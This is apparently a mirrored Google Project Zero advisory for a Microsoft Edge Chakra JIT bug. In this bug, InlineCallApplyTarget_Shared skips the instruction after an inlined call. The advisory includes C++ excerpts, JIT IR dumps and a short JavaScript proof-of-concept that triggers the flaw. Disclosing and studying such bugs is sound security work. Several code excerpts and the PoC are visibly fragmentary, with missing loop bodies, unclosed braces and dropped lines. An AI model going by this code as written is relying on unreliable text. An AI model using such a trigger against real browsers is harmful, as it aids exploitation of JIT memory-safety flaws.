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Microsoft Edge Chakra JIT Inline::InlineCallApplyTarget_Shared Failed Return
来源:Google Security Research 作者:lokihardt 发布时间:2017-11-27  
Microsoft Edge: Chakra: JIT: Inline::InlineCallApplyTarget_Shared doesn't return the return instruction 


Here's a snippet of Inline::Optimize.
    FOREACH_INSTR_EDITING(instr, instrNext, func->m_headInstr)
        switch (instr->m_opcode)
            case Js::OpCode::Label:
                    if (instr->AsLabelInstr()->m_isForInExit)
                        Assert(this->currentForInDepth != 0);  // The PoC hits this
            case Js::OpCode::InitForInEnumerator:
                if (!func->IsLoopBody())
            case Js::OpCode::CallI:
                instrNext = builtInInlineCandidateOpCode != 0 ?
                    this->InlineBuiltInFunction(instr, inlineeData, builtInInlineCandidateOpCode, inlinerData, symThis, &isInlined, profileId, recursiveInlineDepth) :
                    this->InlineScriptFunction(instr, inlineeData, symThis, profileId, &isInlined, recursiveInlineDepth);

"InlineBuiltInFunction" and "InlineScriptFunction" are used to inline a JavaScript function. For example, those methods can convert a call expression as follws.

    s6.var          =  StartCall      1 (0x1).i32                             #0000 
    arg1(s7)<0>.var =  ArgOut_A       s2.var, s6.var                          #0003 
                       CallI          s3.var, arg1(s7)<0>.var                 #0006 

    s0.var          =  Ld_A           0xXXXXXXXX (undefined)[Undefined].var   #000c  <<--- NEXT INSTRUCTION

    s6.var          =  StartCall      1 (0x1).i32                             #0000 
    s12.var         =  InlineeStart   s3.var, iarg1(s7)<24>.var               #0006   Func # (#1.3), #4 obj.inlinee
    s9[Object].var  =  Ld_A           0xXXXXXXXX (GlobalObject)[Object].var   #  Func # (#1.3), #4
    s8.var          =  Ld_A           0xXXXXXXXX (undefined)[Undefined].var   #0000   Func # (#1.3), #4
                       StatementBoundary  #0                                  #0002   Func # (#1.3), #4
                       StatementBoundary  #-1                                 #0002   Func # (#1.3), #4
                       InlineeEnd     4 (0x4).i32, s12.var                    #0000   Func # (#1.3), #4

                       StatementBoundary  #0                                  #000c 
    s0.var          =  Ld_A           0xXXXXXXXX (undefined)[Undefined].var   #000c  <<---- NEXT INSTRUCTION

As you can see the inlinee is wrapped in InlineeStart and InlineeEnd. So to handle the orignal next instructions in the next iterations, those methods must return the call instruction's next instruction. But there's a buggy call flow.

Here's the call flow.
Inline::InlineBuiltInFunction(...) {
    if (inlineCallOpCode ==  Js::OpCode::InlineFunctionCall)
       inlineBuiltInEndInstr = InlineCall(callInstr, inlineeData, inlinerData, symCallerThis, pIsInlined, profileId, recursiveInlineDepth);
       return inlineBuiltInEndInstr->m_next;

-> InlineCall -> InlineCallTarget -> 

Inline::InlineCallApplyTarget_Shared(...) {
    IR::Instr* instrNext = callInstr->m_next;
    return InlineFunctionCommon(callInstr, originalCallTargetOpndIsJITOpt, originalCallTargetStackSym, inlineeData, inlinee, instrNext, returnValueOpnd, callInstr, nullptr, recursiveInlineDepth, safeThis, isApplyTarget);

    return instrNext;

The point is that it ends up returning "callInstr->m_next->m_next". Therefore, "callInstr->m_next" will be never processed.

In the PoC, "InitForInEnumerator" will be skipped.

    s16[LikelyUndefined_CanBeTaggedValue].var = CallI  s6.var, arg2(s15)<8>.var #0015  << will be inlined
                       InitForInEnumerator  s16.var, s17.u64                  #001f  << Skipped

function opt(obj) {
    for (let i in obj.inlinee.call({})) {

    for (let i in obj.inlinee.call({})) {

function main() {
    let obj = {
        inlinee: function () {
    for (let i = 0; i < 10000; i++)


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt

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